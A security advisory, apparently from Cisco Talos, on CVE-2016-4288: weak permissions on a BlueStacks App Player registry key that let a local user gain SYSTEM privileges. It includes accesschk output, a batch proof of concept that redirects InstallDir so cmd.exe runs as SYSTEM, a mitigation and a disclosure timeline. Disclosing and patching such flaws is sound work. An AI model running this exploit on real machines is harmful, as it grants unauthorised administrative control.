CVE-2016-4288
A local privilege escalation vulnerability exists in BlueStacks App Player. The BlueStacks App Player installer creates a registry key with weak permissions that allows users to execute arbitrary programs with SYSTEM privileges.
BlueStacks 2.1.3.5650
http://www.bluestacks.com/
During installation BlueStacks App Player creates registry keys with weak permissions. Here we can see the ‘Users’ group has full permissions on the InstallDir key:
accesschk -k -w -d HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks
HKLM\SOFTWARE\BlueStacks
RW BUILTIN\Users
RW BUILTIN\Administrators
RW NT\SYSTEM
Using process monitor we can observe that BlueStacks service is reading the InstallDir key to obtain installation path and later executes HD-Network.exe and other files from that path. A malicious user can set InstallDir to a directory under their control to execute arbitrary code with SYSTEM privileges.
@echo off
echo [+]Run cmd as SYSTEM
mkdir c:\TALOS
REM Copy others necessary files
copy c:\windows\system32\cmd.exe HD-Network.exe
reg add "HKLM\SOFTWARE\BlueStacks" /f /v "InstallDir" /t REG_SZ /d c:\TALOS\
echo [+]Restore default values
Change the permission for key to group other than Administrator on Read/Execute.
Discovered by Marcin ëIcewallí Noga of Cisco Talos.
2016-03-01 - Discovery
2016—04-13 - Reported
2016-08-04 - Patched
2016-08-04 - Released
Discovered by Marcin Icewall Noga of Cisco Talos.